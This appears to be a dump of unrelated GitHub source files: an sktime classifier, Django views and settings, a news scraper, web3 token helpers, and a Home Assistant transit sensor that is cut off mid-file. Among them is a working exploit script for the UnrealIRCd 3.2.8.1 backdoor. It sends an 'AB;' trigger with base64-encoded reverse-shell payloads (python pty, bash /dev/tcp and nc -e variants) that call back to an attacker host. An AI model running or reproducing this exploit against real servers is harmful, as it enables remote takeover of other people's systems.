word_length=self.word_length,\n alphabet_size=self.alphabet_size,\n window_size=self.window_size,\n norm=self.norm,\n levels=self.levels,\n binning_method=\"information-gain\" if self.igb else \"equi-depth\",\n bigrams=self.bigrams,\n remove_repeat_words=True,\n lower_bounding=False,\n save_words=False,\n keep_binning_dft=True,\n use_fallback_dft=True,\n typed_dict=self.typed_dict,\n n_jobs=self._threads_to_use,\n )\n )\n\n X_dim = X[:, i, :].reshape(self.n_instances_, 1, self.series_length_)\n\n transformers[i].fit(X_dim, y)\n sfa = transformers[i].transform(\n X_dim,\n y,\n )\n transformers[i].keep_binning_dft = False\n transformers[i].binning_dft = None\n\n correct = 0\n for i in range(self.n_instances_):\n if self._train_predict(i, sfa[0]) == y[i]:\n correct = correct + 1\n\n accs.append(correct)\n\n max_acc = max(accs)\n\n dims = []\n fin_transformers = []\n for i in range(self.n_dims_):\n if accs[i] >= max_acc * self.dim_threshold:\n dims.append(i)\n fin_transformers.append(transformers[i])\n\n if len(dims) > self.max_dims:\n rng = check_random_state(self.random_state)\n idx = rng.choice(len(dims), self.max_dims, replace=False).tolist()\n dims = [dims[i] for i in idx]\n fin_transformers = [fin_transformers[i] for i in idx]\n\n return dims, fin_transformers\n\n def _train_predict(self, train_num, bags=None):\n if bags is None:\n bags = self._transformed_data\n\n test_bag = bags[train_num]\n best_sim = -1\n nn = None\n\n for n, bag in enumerate(bags):\n if n == train_num:\n continue\n\n sim = histogram_intersection(test_bag, bag)\n\n if sim > best_sim:\n best_sim = sim\n nn = self._class_vals[n]\n\n return nn\n\n\ndef histogram_intersection(first, second):\n \"\"\"Find the distance between two histograms using the histogram intersection.\n\n This distance function is designed for sparse matrix, represented as a\n dictionary or numba Dict, but can accept arrays.\n\n Parameters\n ----------\n first : dict, numba.Dict or array\n First dictionary used in distance measurement.\n second : dict, numba.Dict or array\n Second dictionary that will be used to measure distance from `first`.\n\n Returns\n -------\n dist : float\n The histogram intersection distance between the first and second dictionaries.\n \"\"\"\n from numba.typed import Dict\n\n from sktime.classification.dictionary_based._tde_numba import (\n _histogram_intersection_dict,\n )\n\n if isinstance(first, dict):\n sim = 0\n for word, val_a in first.items():\n val_b = second.get(word, 0)\n sim += min(val_a, val_b)\n return sim\n elif isinstance(first, Dict):\n return _histogram_intersection_dict(first, second)\n else:\n return np.sum(\n [\n 0 if first[n] == 0 else np.min(first[n], second[n])\n for n in range(len(first))\n ]\n )\n","repo_name":"sktime/sktime","sub_path":"sktime/classification/dictionary_based/_tde.py","file_name":"_tde.py","file_ext":"py","file_size_in_byte":37045,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"35946616550","text":"#!/usr/bin/python3\nimport argparse\nimport socket\nimport base64\n\n# Sets the target ip and port from argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('ip', help='target ip')\nparser.add_argument('port', help='target port', type=int)\nparser.add_argument('-payload', help='set payload type', required=True, choices=['python', 'netcat', 'bash'])\nargs = parser.parse_args()\n\n# Sets the local ip and port (address and port to listen on)\nlocal_ip = '' # CHANGE THIS\nlocal_port = '' # CHANGE THIS \n\n# The different types of payloads that are supported\npython_payload = f'python -c \"import os;import pty;import socket;tLnCwQLCel=\\'{local_ip}\\';EvKOcV={local_port};QRRCCltJB=socket.socket(socket.AF_INET,socket.SOCK_STREAM);QRRCCltJB.connect((tLnCwQLCel,EvKOcV));os.dup2(QRRCCltJB.fileno(),0);os.dup2(QRRCCltJB.fileno(),1);os.dup2(QRRCCltJB.fileno(),2);os.putenv(\\'HISTFILE\\',\\'/dev/null\\');pty.spawn(\\'/bin/bash\\');QRRCCltJB.close();\" '\nbash_payload = f'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1'\nnetcat_payload = f'nc -e /bin/bash {local_ip} {local_port}'\n\n# our socket to interact with and send payload\ntry:\n s = socket.create_connection((args.ip, args.port))\nexcept socket.error as error:\n print('connection to target failed...')\n print(error)\n \n# craft out payload and then it gets base64 encoded\ndef gen_payload(payload_type):\n base = base64.b64encode(payload_type.encode())\n return f'echo {base.decode()} |base64 -d|/bin/bash'\n\n# all the different payload options to be sent\nif args.payload == 'python':\n try:\n s.sendall((f'AB; {gen_payload(python_payload)} \\n').encode())\n except:\n print('connection made, but failed to send exploit...')\n\nif args.payload == 'netcat':\n try:\n s.sendall((f'AB; {gen_payload(netcat_payload)} \\n').encode())\n except:\n print('connection made, but failed to send exploit...')\n\nif args.payload == 'bash':\n try:\n s.sendall((f'AB; {gen_payload(bash_payload)} \\n').encode())\n except:\n print('connection made, but failed to send exploit...')\n \n#check display any response from the server\ndata = s.recv(1024)\ns.close()\nif data != '':\n print('Exploit sent successfully!')","repo_name":"Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor","sub_path":"exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"52"} +{"seq_id":"24088674131","text":"from split_settings.tools import include\n\n# imports all settings defined in the geoluminate/conf/settings/ directory\ninclude(\"settings/general.py\", \"settings/*.py\")\n\nINSTALLED_APPS = GEOLUMINATE_APPS + INSTALLED_APPS + [\"compressor\", \"django_extensions\"]\n\nDEBUG = True\n\n# https://django-compressor.readthedocs.io/en/latest/settings/#django.conf.settings.COMPRESS_ENABLED\nCOMPRESS_ENABLED = False # don't compress during development\n\n# http://whitenoise.evans.io/en/latest/django.html#using-whitenoise-in-development\n# INSTALLED_APPS = [\"whitenoise.runserver_nostatic\", *GEOLUMINATE_APPS]\n\n# SOCIALACCOUNT_PROVIDERS[\"orcid\"][\"BASE_DOMAIN\"] = \"sandbox.orcid.org\"\n\nCOMPRESS_OFFLINE = False\n\n# https://docs.celeryq.dev/en/stable/userguide/configuration.html#task-eager-propagates\nCELERY_TASK_EAGER_PROPAGATES = True\n\n# INSTALLED_APPS += [\"django_extensions\"] # F405\n\nLOCKDOWN_ENABLED = False\n\nSTATICFILES_STORAGE = \"whitenoise.storage.CompressedStaticFilesStorage\"\n\n# BASE_SERIALIZER = \"geoluminate.api.serializers.HyperlinkedModelSerializer\"\n","repo_name":"Geoluminate/geoluminate","sub_path":"geoluminate/conf/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"3947040894","text":"#Take the value and index as inputs, and then, in return, have the output be the value of the \"piece\" at the reversed index\n#Hint: \"pieces\" are numbered sequentially from the first index\n\ndef reverse_piece(value, piece_index):\n b = bin(value)[2:]\n if piece_index > len(b): b = b.zfill(piece_index)\n index, b = len(b) - piece_index, list(b)\n b[index] = '1' if b[index] == '0' else '0'\n return int(''.join(b), 2)\n\nprint(reverse_piece(19,7))\n\n#in order to check if your solution is correct, when calling the function, if the inputs are 19,7 (the replacement for their named counterparts (replacing value, piece_index)), then the output should be 83.\n","repo_name":"2020rkessler/main-folder","sub_path":"newkata.py","file_name":"newkata.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74659937444","text":"# Django default modules\nfrom django.shortcuts import render, render_to_response, get_object_or_404\nfrom django.views.generic import View\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.context_processors import csrf\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.core.urlresolvers import reverse\nfrom django.template import RequestContext\nfrom django.core.mail import send_mail\n\n# Python modules\nimport hashlib, datetime, random\n\n# Local modules\nfrom apps.giftyuser.models import User\nfrom apps.giftyuser.serializers import UserSerializer\nfrom apps.giftyuser.forms import UserForm, LoginForm\nfrom services.utilities import send_django_mail\n\n\n# Third party modules\nfrom rest_framework import viewsets\n\n# Create your views here.\n\n# ViewSets define the view behavior.\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n# Class Based Login View\nclass LoginView(View):\n\tdef get(self, request):\n\t\tform = LoginForm()\n\t\treturn render_to_response('giftyuser/login.html', locals(), context_instance=RequestContext(request))\n\n\tdef post(self, request):\n\t\tform = LoginForm(request.POST)\n\t\tif form.is_valid:\n\t\t\tusername = form.data['username']\n\t\t\tpassword = form.data['password']\n\t\t\tuser = authenticate(username=username, password=password)\n\t\t\tif user is not None:\n\t\t\t\tlogin(request, user)\n\t\t\t\treturn HttpResponseRedirect(reverse('home'), locals())\n\t\treturn render_to_response('giftyuser/login.html', locals(), context_instance=RequestContext(request))\n\n\n# Class Based Logout View\nclass LogoutView(View):\n\tdef get(self, request):\n\t\tlogout(request)\n\t\treturn HttpResponseRedirect(reverse('home'), locals())\n\n# Class Based Signup View\nclass UserCreate(View):\n def get(self, request):\n form = UserForm()\n return render_to_response('auth/signup.html', locals(), context_instance=RequestContext(request))\n\n def post(self, request):\n form = UserForm(request.POST)\n if form.is_valid():\n new_user = form.save(commit=False)\n new_user.is_active = False\n new_user.set_password(form.data['password'])\n salt = hashlib.sha1(str(random.random())).hexdigest()[:5]\n new_user.activation_key = hashlib.sha1(salt+new_user.email).hexdigest()\n new_user.save()\n body = \"\\\n Click on this link to activate your account\\\n \" % (request.META['HTTP_ORIGIN'], new_user.activation_key)\n send_django_mail('MarbalNG Account Confirmation', 'isaac.e.ayodeji@gmail.com', [new_user.email], html_content=body)\n return HttpResponseRedirect(reverse('home'), locals())\n\n return render_to_response('auth/signup.html', locals(), context_instance=RequestContext(request))\n\n# Function to confirm user account\ndef register_confirm(request, activation_key):\n if request.user.is_active:\n return HttpResponseRedirect(reverse('home'))\n user = get_object_or_404(User, activation_key=activation_key)\n user.is_active = True\n user.save()\n send_django_mail('Welcome to MarbalNG', 'isaac.e.ayodeji@gmail.com', [user.email], 'Welcome to MarbalNG')\n return HttpResponseRedirect(reverse('login'))\n\n\n\n\n\n\n\n\n\n\n","repo_name":"emmanuel-isaac/gifty","sub_path":"apps/giftyuser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26600674224","text":"import time\nimport requests\nfrom parsel import Selector\n\nfrom tech_news.database import create_news\n\n\ndef fetch(url):\n try:\n response = requests.get(\n url, headers={\"user-agent\": \"Fake user-agent\"}, timeout=3)\n time.sleep(1)\n response.raise_for_status()\n except (requests.HTTPError, requests.ReadTimeout):\n return None\n else:\n return response.text\n\n\ndef scrape_novidades(html_content):\n selector = Selector(html_content)\n return selector.css(\"a.cs-overlay-link::attr(href)\").getall()\n\n\ndef scrape_next_page_link(html_content):\n selector = Selector(html_content)\n return selector.css(\".next::attr(href)\").get()\n\n\ndef scrape_noticia(html_content):\n selector = Selector(html_content)\n return {\n \"url\": selector.css(\"link[rel=canonical]::attr(href)\").get(),\n \"title\": selector.css(\"h1.entry-title::text\").get().strip(),\n \"timestamp\": selector.css(\".meta-date::text\").get(),\n \"writer\": selector.css(\".author a::text\").get(),\n \"comments_count\": len(selector.css(\"#comments\").getall()),\n \"summary\": \"\".join(\n selector.css(\".entry-content > p:nth-of-type(1) *::text\").getall()\n ).strip(),\n \"tags\": selector.css(\".post-tags a::text\").getall(),\n \"category\": selector.css(\"div.meta-category .label::text\").get()\n }\n\n\ndef get_tech_news(amount):\n BASE_URL = \"https://blog.betrybe.com\"\n news = []\n\n while len(news) < amount:\n content = fetch(BASE_URL)\n links = scrape_novidades(content)\n\n for i in range(min(amount - len(news), len(links))):\n news.append(scrape_noticia(fetch(links[i])))\n\n BASE_URL = scrape_next_page_link(content)\n\n create_news(news)\n return news\n","repo_name":"NunesNathan/Trybe-Tech-News","sub_path":"tech_news/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5998897749","text":"#!/usr/bin/env python3\n\nimport json\n\nimport pandas as pd\n\nfrom cook_data import OUTPUT_PATH\nfrom utils import connect, parse_date\n\n\nif __name__ == '__main__':\n data = pd.read_csv(OUTPUT_PATH)\n data_json = json.loads(data.to_json(orient='records'))\n data_to_db = []\n for i in range(len(data_json)):\n start = parse_date(data_json[i]['start_at'])\n\n # get data for last 3 years\n if start.year < 2017:\n continue\n\n end = parse_date(data_json[i]['end_at'])\n duration = (end - start).total_seconds()\n # for now filter out all non-hourly counts\n if duration != 3600:\n continue\n\n data_json[i]['start_at'] = start\n data_json[i]['end_at'] = end\n data_json[i]['weekday'] = start.strftime('%A')\n data_json[i]['month'] = start.strftime('%B')\n data_json[i]['installed_at'] = parse_date(data_json[i]['installed_at'])\n data_to_db.append(data_json[i])\n\n # save to mongo\n db = connect()\n db.main.delete_many({})\n db.main.insert_many(data_to_db)\n\n print(f'Successfully insert {len(data_to_db)} documents. ({len(data) - len(data_to_db)} filtered)')\n","repo_name":"babajka-at-junction/data","sub_path":"src/init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31019529154","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Game',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('guess_count', models.PositiveSmallIntegerField(default=0)),\n ('outcome', models.CharField(max_length=4, choices=[(b'WIN', b'Win'), (b'LOSS', b'Loss')])),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Word',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('word', models.CharField(max_length=255)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='game',\n name='word',\n field=models.ForeignKey(to='hangman.Word'),\n preserve_default=True,\n ),\n ]\n","repo_name":"MattTheRed/hangman","sub_path":"hangman/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42015544289","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport urllib.request\nimport pandas as pd\n\n\n# In[2]:\n\n\nurl=\"https://en.wikipedia.org/wiki/List_of_postal_codes_of_Canada:_M\"\npost_list_html=urllib.request.urlopen(url).read()\n\n\n# In[3]:\n\n\npostal=pd.read_html(post_list_html)\n\n\n# In[4]:\n\n\nprint(postal)\n\n\n# In[5]:\n\n\nfrom bs4 import BeautifulSoup\nsoup=BeautifulSoup(post_list_html,'lxml')\n\n\n# In[6]:\n\n\nsoup.text\n\n\n# In[7]:\n\n\nsoup.prettify()\n\n\n# In[8]:\n\n\nlen(postal)\n\n\n# In[9]:\n\n\nprint(postal[0])\n\n\n# In[10]:\n\n\npostal[0].columns\n\n\n# In[11]:\n\n\npostal[0].index\n\n\n# In[12]:\n\n\nimport numpy as np\npostal_array=np.array(postal[0])\ncode_postal=pd.DataFrame(postal_array,index=postal[0].index,columns=postal[0].columns)\n\n\n# In[13]:\n\n\ncode_postal.head()\n\n\n# In[14]:\n\n\ncode_postal.tail()\n\n\n# In[15]:\n\n\ncode_postalr=code_postal[code_postal[\"Borough\"]!=\"Not assigned\"]\n\n\n# In[16]:\n\n\nprint(code_postalr.head(10))\n\n\n# In[17]:\n\n\ncode_postalm=code_postalr.copy()\n\n\n# In[18]:\n\n\nprint(code_postalm.columns)\n\n\n# In[33]:\n\n\ncode_postalr.Neighbourhood[code_postalm.Neighbourhood==\"Not assigned\"]= code_postalm.loc[code_postalm.Neighbourhood==\"Not assigned\",'Borough']\n\n\n# In[20]:\n\n\ncode_postalr.head(10)\n\n\n# In[21]:\n\n\nmask=code_postalr.Postcode.duplicated(keep=False)\n\n\n# In[22]:\n\n\ncode_postalr[mask]\n\n\n# In[23]:\n\n\ncode_postalrw=code_postalr[~mask]\n\n\n# In[24]:\n\n\ncode_postalrw.head(10)\n\n\n# In[25]:\n\n\ncoder=code_postalr[mask]\n\n\n# In[26]:\n\n\ncoder.index\n\n\n# In[27]:\n\n\ncoder.Postcode\n\n\n# In[28]:\n\n\ncoderw=coder.drop_duplicates(subset=\"Postcode\",keep=\"first\")\n\n\n# In[29]:\n\n\ncoderw\n\n\n# In[30]:\n\n\nf=lambda x: ','.join(z for z in coder.loc[coder.Postcode==x,'Neighbourhood']) \n\n\n# In[31]:\n\n\nfor x in coderw.index:\n coderw.Neighbourhood[x]=f(coderw.Postcode[x])\n\n\n# In[32]:\n\n\ncoderw\n\n\n# In[43]:\n\n\ncode_full = pd.concat([code_postalrw,coderw], ignore_index='True')\n\n\n# In[44]:\n\n\ncode_full\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"sednabcn/Python-Capstone","sub_path":"Table_jupyter.py","file_name":"Table_jupyter.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39090056393","text":"from main import redis\nimport time\n\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\n\n# Use a service account\ncred = credentials.Certificate('serviceAccount.json')\nfirebase_admin.initialize_app(cred)\n\ndb = firestore.client()\n\n\nkey = 'test_union'\ngroup = 'inventory-group'\n\ntry:\n redis.xgroup_create(key, group)\nexcept:\n print('Group already exists!')\n\nwhile True:\n try:\n results = redis.xreadgroup(group, key, {key: '>'}, None)\n\n if results != []:\n for result in results:\n obj = result[1][0][1]\n print(obj)\n\n data = {\n u'id': obj['id'],\n u'original_title': obj['original_title'],\n u'authors': obj['authors'],\n u'average_rating': obj['average_rating'],\n u'ratings_count': obj['ratings_count'],\n u'image_url': obj['image_url'],\n u'isbn': obj['isbn'],\n }\n\n # Add a new doc in collection 'cities' with ID 'LA'\n db.collection(u'books').add(data)\n\n except Exception as e:\n print(str(e))\n time.sleep(1)\n","repo_name":"nurrizkyimani/scalable_ml_model","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33370809649","text":"import datetime\nimport logging\nimport requests # type: ignore\nimport threading\nimport time\nimport urllib\nfrom typing import Any\nfrom typing import Dict\n\n\nclass Poll:\n \"\"\"Device code authentication polling handler\n\n Based on:\n https://github.com/secureworks/squarephish/blob/main/squarephish/modules/server/auth.py\n \"\"\"\n\n @classmethod\n def run(\n cls,\n device_code: Dict[str, Any],\n client_id: str,\n scope: str,\n proxies: Dict[str, str] = None,\n verify: bool = True,\n ) -> Dict[str, Any]:\n \"\"\"Poll the MS token endpoint for valid authentication\n\n :param device_code: device code json response\n :param client_id: client id requested for the token\n :param scope: requested token scope\n :param proxies: http request proxy\n :param verify: http request certificate verification\n :returns: token json response\n \"\"\"\n if proxies:\n verify = False\n\n # Generate POST request data for polling Microsoft for authentication\n url = \"https://login.microsoftonline.com/organizations/oauth2/v2.0/token\"\n params = (\n (\"grant_type\", \"urn:ietf:params:oauth:grant-type:device_code\"),\n (\"code\", device_code[\"device_code\"]),\n (\"client_id\", client_id),\n (\"scope\", scope),\n )\n data = urllib.parse.urlencode(params)\n\n # Poll only for the time given before the device code expires\n expires_in = int(device_code[\"expires_in\"]) / 60\n end_delta = datetime.timedelta(minutes=expires_in)\n stop_time = datetime.datetime.now() + end_delta\n\n while True:\n logging.debug(f\"Polling for oAuth authentication\")\n response = requests.post(\n url,\n data=data,\n proxies=proxies,\n verify=verify,\n )\n\n # Successful auth\n if response.status_code == 200:\n break\n\n # Bad response\n if response.json()[\"error\"] != \"authorization_pending\":\n logging.error(f\"Invalid poll response:\\n{response.json()}\")\n return None\n\n # Handle device code expiration/timeout\n if datetime.datetime.now() >= stop_time:\n logging.error(f\"Device code expired\")\n return None\n\n # Wait the provided interval time between polls\n time.sleep(int(device_code[\"interval\"]))\n\n # Grab the token response\n token_response = response.json()\n return token_response\n\n\nclass PollThread(threading.Thread):\n \"\"\"Custom threading class to poll for device code authentication\"\"\"\n\n def __init__(\n self,\n group=None,\n target=None,\n name=None,\n args=(),\n kwargs={},\n Verbose=None,\n ):\n \"\"\"Initialize polling thread\"\"\"\n threading.Thread.__init__(self, group, target, name, args, kwargs)\n self._return = None\n\n def join(self, *args):\n \"\"\"Override join to return value\"\"\"\n threading.Thread.join(self, *args)\n return self._return\n\n def run(self):\n \"\"\"Override run to return value\"\"\"\n if self._target is not None:\n self._return = self._target(*self._args, **self._kwargs)\n","repo_name":"secureworks/TokenMan","sub_path":"tokenman/oauth/poll.py","file_name":"poll.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"52"} +{"seq_id":"71175402726","text":"import unittest\nimport itertools\n\nimport main\n\nclass CircuitTest(unittest.TestCase):\n\n def test_get_v_from_angle_range(self):\n \"\"\" Test to confirm that voltage values are in range with Circuit method. \"\"\"\n # Create inputs\n circuit = main.Circuit()\n deg_lmt, sclr_lmt, cnst_lmt = 360, 10, 10\n input_possibilities = itertools.product(\n [i for i in range(deg_lmt)],\n [sclr_lmt*i/100 for i in range(100)],\n [cnst_lmt*i/100 for i in range(100)],\n )\n for input_possibility in input_possibilities:\n deg,sclr,cnst = input_possibility[0], input_possibility[1], input_possibility[2]\n value_max = abs(sclr) + cnst\n value_min = cnst - abs(sclr)\n # Now, test math.sin\n val = circuit.get_v_from_angle(deg, main.math.sin, sclr, cnst)\n assert type(val) == type(value_max) and type(val) == type(value_min), type(val)\n assert val >= value_min, \"Degree,Scalar,Constant | {}\".format(input_possibility)\n assert val <= value_max, \"Degree,Scalar,Constant | {}\".format([input_possibility, val])\n # Now, test math.cos\n val = circuit.get_v_from_angle(deg, main.math.cos, sclr, cnst)\n assert type(val) == type(value_max) and type(val) == type(value_min), type(val)\n assert val >= value_min, \"Degree,Scalar,Constant | {}\".format(input_possibility)\n assert val <= value_max, \"Degree,Scalar,Constant | {}\".format([input_possibility, val])\n\n","repo_name":"Racerin/Brain-Storm","sub_path":"TPS Hall sensor calculations/tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34663481260","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom user.models import UserProfile\n# Create your models here.\nclass SavingsGoals(models.Model):\n GOAL_CATEGORY=((\"financial\",\"Financial\"),(\"personal\",\"Personal\"),)\n user=models.ForeignKey(UserProfile,on_delete=models.CASCADE)\n title=models.CharField(max_length=255)\n target_amount=models.DecimalField(max_digits=255,decimal_places=2)\n due_date=models.DateField()\n progress=models.TextField()\n notes=models.TextField()\n category=models.CharField(max_length=255,choices=GOAL_CATEGORY)\n alert=models.BooleanField(default=True)\n created_at=models.DateTimeField(auto_now_add=True)\n updated_at=models.DateTimeField(auto_now=True)\n\n \n","repo_name":"Loice-KaniniMwau/CHAMA_BACKEND_LOGIC","sub_path":"savingsgoals/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2235455848","text":"import os\nfrom web3 import Web3\nfrom dotenv import load_dotenv\nimport json\n\nload_dotenv()\nnode_provider = os.environ['NODE_PROVIDER']\nweb3_connection = Web3(Web3.HTTPProvider(node_provider))\n\ndef are_we_connected():\n return web3_connection.isConnected()\n\ndef build_contract(contract_address, abi_path):\n with open(abi_path) as f:\n abiJson = json.load(f)\n contract = web3_connection.eth.contract(address=contract_address, abi=abiJson['abi'])\n return contract\n\ndef get_address(private_key):\n return web3_connection.eth.account.from_key(private_key).address\n\ndef transfer(_contract, _to, _amount, _signature):\n nonce = web3_connection.eth.get_transaction_count(get_address(_signature))\n function_call = _contract.functions.transfer(_to, _amount).buildTransaction({'nonce':nonce})\n signed_transaction = web3_connection.eth.account.sign_transaction(function_call, _signature)\n result = web3_connection.eth.send_raw_transaction(signed_transaction.rawTransaction)\n return result\n\ndef allowanceUp(_contract, _to, _amount, _signature):\n nonce = web3_connection.eth.get_transaction_count(get_address(_signature))\n function_call = _contract.functions.increaseAllowance(_to, _amount).buildTransaction({'nonce':nonce})\n signed_transaction = web3_connection.eth.account.sign_transaction(function_call, _signature)\n result = web3_connection.eth.send_raw_transaction(signed_transaction.rawTransaction)\n return result\n","repo_name":"DanielMoralisSamples/Video_Tutorials","sub_path":"03A-token_dapp/token_dapp.py","file_name":"token_dapp.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"52"} +{"seq_id":"34515915747","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\n\n\n\ndef charReplacement(inputFilePath, outputFileDir, charToReplace, replacementChar):\n\tinputPathArray = inputFilePath.split(\"/\")\n\tinputName = inputPathArray[len(inputPathArray) - 1]\n\tinputNameArray = inputName.split(\".\")\n\toutputName = inputNameArray[0] + \"_replaced\" + \".txt\"\n\toutputPath = os.path.join(outputFileDir, outputName)\n\tprint((\"InputFilePath: \" + inputFilePath))\n\tprint((\"InputFileName: \" + inputName))\n\tprint((\"OutputFileName: \" + outputName))\n\tprint((\"OutputFilePath: \" + outputPath))\n\twith open(inputFilePath, \"r\") as inputFile:\n\t\tfileData = inputFile.read()\n\t\tfileData = fileData.replace(charToReplace, replacementChar)\n\t\tinputFile.close()\n\twith open(outputPath, \"w\") as outputFile:\n\t\toutputFile.write(fileData)\n\t\toutputFile.close()\n\n\ndef main():\n\tinputFilePath = sys.argv[1]\n\toutputFilePath = sys.argv[2]\n\tcharToReplace = sys.argv[3]\n\treplacementChar = sys.argv[4]\n\tcharReplacement(inputFilePath, outputFilePath, charToReplace, replacementChar)\n\nmain()\n","repo_name":"melimat/Datalogging","sub_path":"Commas-replacement.py","file_name":"Commas-replacement.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25043349925","text":"\"\"\"\r\nSimple service for SL (Storstockholms Lokaltrafik)\r\n\r\n\r\n\"\"\"\r\nimport datetime\r\nfrom datetime import timedelta\r\nimport logging\r\n\r\nimport voluptuous as vol\r\nimport requests\r\n\r\nimport homeassistant.helpers.config_validation as cv\r\nfrom homeassistant.components.sensor import PLATFORM_SCHEMA\r\nfrom homeassistant.helpers.aiohttp_client import async_get_clientsession\r\nfrom homeassistant.helpers.entity import Entity\r\nfrom homeassistant.helpers.event import (\r\n async_track_point_in_utc_time, async_track_utc_time_change)\r\nfrom homeassistant.util import dt as dt_util\r\n\r\nfrom homeassistant.components.sensor import PLATFORM_SCHEMA\r\nimport homeassistant.helpers.config_validation as cv\r\nfrom homeassistant.helpers.entity import Entity\r\nfrom homeassistant.util import Throttle\r\n\r\n_LOGGER = logging.getLogger(__name__)\r\n\r\nCONF_RI4_KEY = 'ri4key'\r\nCONF_SITEID = 'siteid'\r\nCONF_LINES = 'lines'\r\nCONF_NAME = 'name'\r\nCONF_DIRECTION = 'direction'\r\n\r\nUPDATE_FREQUENCY = timedelta(seconds=60)\r\nFORCED_UPDATE_FREQUENCY = timedelta(seconds=5)\r\n\r\nUSER_AGENT = \"Home Assistant SL Sensor\"\r\n\r\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\r\n vol.Required(CONF_RI4_KEY): cv.string, \r\n vol.Required(CONF_SITEID): cv.string,\r\n vol.Optional(CONF_LINES): cv.string,\r\n vol.Optional(CONF_NAME): cv.string,\r\n vol.Optional(CONF_DIRECTION) : cv.string\r\n\r\n})\r\n\r\n\r\ndef setup_platform(hass, config, add_devices, discovery_info=None):\r\n \"\"\"Setup the sensors.\r\n \r\n right now only one, but later there should probably be another sensor for deviations at the same site\r\n \"\"\"\r\n\r\n data = SlDepartureBoardData(\r\n config.get(CONF_RI4_KEY),\r\n config.get(CONF_SITEID),\r\n config.get(CONF_LINES),\r\n config.get(CONF_DIRECTION)\r\n )\r\n\r\n sensors = []\r\n sensors.append(\r\n SLDepartureBoardSensor(\r\n data, \r\n config.get(CONF_SITEID),\r\n config.get(CONF_NAME)\r\n )\r\n )\r\n add_devices(sensors)\r\n\r\nclass SLDepartureBoardSensor(Entity):\r\n \"\"\"Department board for one SL site.\"\"\"\r\n\r\n def __init__(self, data, siteid, name):\r\n \"\"\"Initialize\"\"\"\r\n self._sensor = 'sl'\r\n self._siteid = siteid\r\n self._name = name or siteid\r\n self._data = data\r\n self._nextdeparture = 9999\r\n self._board = []\r\n\r\n @property\r\n def name(self):\r\n \"\"\"Return the name of the sensor.\"\"\"\r\n return '{} {}'.format(self._sensor, self._name)\r\n\r\n @property\r\n def icon(self):\r\n \"\"\" Return the icon for the frontend.\"\"\"\r\n return 'fa-subway'\r\n\r\n @property\r\n def state(self):\r\n \"\"\" Return number of minutes to the next departure \"\"\"\r\n if len(self._board) > 0:\r\n return self._board[0]['time']\r\n\r\n return 9999\r\n\r\n @property\r\n def device_state_attributes(self):\r\n \"\"\" Return the sensor attributes .\"\"\"\r\n\r\n val = {}\r\n val['attribution'] = 'Data from sl.se / trafiklab.se'\r\n val['unit_of_measurement'] = 'min'\r\n\r\n if not(self._data.data) :\r\n return val\r\n\r\n if len(self._board) > 0:\r\n val['next_line'] = self._board[0]['line']\r\n 